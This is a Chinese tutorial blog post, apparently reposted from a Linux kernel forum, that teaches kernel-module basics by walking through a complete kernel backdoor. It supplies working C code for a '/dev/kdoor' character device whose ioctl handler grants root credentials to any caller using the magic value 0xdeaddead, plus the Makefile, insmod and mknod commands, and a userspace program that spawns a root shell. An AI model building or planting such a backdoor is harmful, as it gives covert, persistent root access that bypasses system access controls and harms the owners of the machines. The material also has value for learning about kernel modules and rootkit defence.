Linux内核支持运行时动态扩展,即运行时动态加载内核扩展模块(.ko文件),ko文件所包含的代码经加载后即成为内核代码的一部分,拥有内核特权,可以调用内核其它组件,访问内核空间数据以及操作硬件。当然也有跟内核代码一样的限制,如较小的函数调用栈,不支持浮点运算等。
此处列举一些内核模块特有的能力:
- 硬件驱动。内核模块作为硬件的驱动程序,这应该是内核模块最主要的设计目标。
- 进程控制。内核态对进程有完全的控制权,如权限提升(如内核后门)、信号挂起(如保护某个进程不被kill -9误杀)。
- 内核扩展。内核有一些扩展点,是需要用模块来完成的(Linux的防火墙框架netfilter)。
此外,由于众所周知的原因,开发内核模块,只能使用C语言。
内核模块与用户空间的接口
内核和用户空间的通信,主要有以下几种方式:
- 系统调用
- ioctl
- proc
- netlink
其中,系统调用是最直接的,但不适用于内核模块,因为扩展系统调用需要编译整个内核,这违背了运行时动态扩展的初衷;/proc是一个伪文件系统,可以用于传递信息,但无法做到实时,因为文件系统是被动的;netlink接口类似socket,提供内核和用户态间的双向通信,功能上完全没问题,但用起来有些复杂,适合做更重要的事情。所以,这里用ioctl来实现。
ioctl是针对文件的操作,所以这里的套路是:创建一个设备文件,并把内核模块指定为这个设备文件的驱动程序。这样,用户空间对这个设备文件发出的ioctl指令,即可传达给内核模块。
内核后门思路
由于内核代码拥有系统最高权限(当然,装载内核模块需要root权限,否则系统就没有安全性可言了),故可以在内核模块中留下后门,以便随后的某个时刻获取系统最高权限。其实现思路很简单,内核模块加载后作为内核一部分运行,用户空间进程通过ioctl调用内核模块中的函数,内核模块将调用者进程的uid和gid设置为root,即可实现权限提升。另外,由于内核模块是跟内核运行在一起的,故这种后门是没有进程的。
具体实现
声明初始化和结束入口
//其中init和cleanup是模块里实现的函数,会在下面介绍
module_init(init);
module_exit(cleanup);
内核模块被加载和卸载时,相应的初始化和清理函数被调用,一般是做一些资源的申请、释放操作。
设备注册
分配设备号,并指定模块中的函数作为设备驱动例程,这个过程一般在模块的初始化函数里实现,模块的初始化函数在模块被加载时被自动调用:
static int init(void) {
const char *const dev_name = "/dev/kdoor";
g_major = register_chrdev(0, dev_name, &fops);
if (g_major < 0) {
return g_major;
}
return 0;
}
其中的fops是一个函数指针数组,用于指定设备驱动函数地址,这里只需要注册响应打开文件,关闭文件和ioctl的函数:
static struct file_operations fops = {
.owner = THIS_MODULE,
.open = device_open,
.release = device_release,
.unlocked_ioctl = device_ioctl
};
同理,需要在模块被卸载时卸载驱动。释放设备号资源:
static void cleanup(void) {
//这个dev_name将出现在/proc/devices里
const char *const dev_name = "/dev/kdoor";
unregister_chrdev(g_major, dev_name);
}
处理设备打开
有进程打开相应设备文件时,该函数被自动调用,这里由于功能太简单,什么都不需要做,返回成功即可:
static int device_open(struct inode *inode, struct file *file) {
return 0;
}
响应ioctl
有进程在设备文件上调用ioctl时,该函数被自动调用,我们的后门功能也就在这里完成:
static long device_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
//涉及到Linux的RCU操作,不能直接赋值,稍微有点繁琐但并不复杂
struct cred *new_cred;
kuid_t kuid = KUIDT_INIT(0);
kgid_t kgid = KGIDT_INIT(0);
if (cmd == 0xdeaddead) {
new_cred = prepare_creds();
if (new_cred == NULL) {
return -ENOMEM;
}
new_cred->uid = kuid;
new_cred->gid = kgid;
new_cred->euid = kuid;
new_cred->egid = kgid;
commit_creds(new_cred);
}
return 0;
}
处理设备关闭
设备文件描述符被关闭时,或者进程异常时,这个函数被自动调用,针对这个例子,这里依然什么都不需要做:
static int device_release(struct inode *inode, struct file *file) {
return 0;
}
后门的使用
编译内核模块
核心是一个特殊的Makefile:
ifneq ($(KERNELRELEASE),)
obj-m:=kdoor.o
else
PWD:=$(shell pwd)
KDIR:=/lib/modules/$(shell uname -r)/build
all:
$(MAKE) -C $(KDIR) M=$(PWD)
clean:
rm -rf *.o *.mod.c *.ko *.symvers *.order *.markers
endif
另外,内核模块编译时,还需要安装内核开发目录。
加载模块
上述模块经过编译后,即可得到一个ko文件:
insmod ./kdoor.ko
创建设备
使用mknod命令创建设备文件: 根据设备驱动编号创建设备文件,以便用户空间可以与内核模块通信:
mknod /dev/kdoor c `grep KDoor /proc/devices|awk '{print $1}'` 0
第二个参数c表示此处创建的是一个字符设备,第三个参数是设备号,可以从/proc/devices文件获取。
在用户空间使用这个后门(将调用进程权限提升为root)
直接上代码(留意注释):
int main(int argc, char *argv[]) {
const char * const dev_name = "/dev/kdoor";
//打开文件
int fd = open(dev_name, O_RDWR);
if (-1 == fd) {
return 1;
}
//通过ioctl调用到模块中的实现
int ret = ioctl(fd, 0xdeaddead, 0);
if (ret != 0) {
return 1;
}
//执行shell,此shell即拥有root权限
execlp("sh", "sh", NULL);
return 0;
}
小结
本文通过开发一个简单内核后门(普通进程通过访问内核模块来提升权限)的开发,演示来内核模块的能力,以及模块作为设备驱动与用户空间通信的一般套路,希望能起到抛砖引玉的作用,至少让读者知道有内核模块这么一回事。
- - 内核技术中文网 - 构建全国最权威的内核技术交流分享论坛
原文地址:Linux内核模块入门之简单内核后门 - Linux内核 - 内核技术中文网 - 构建全国最权威的内核技术交流分享论坛(版权归原作者所有,侵删)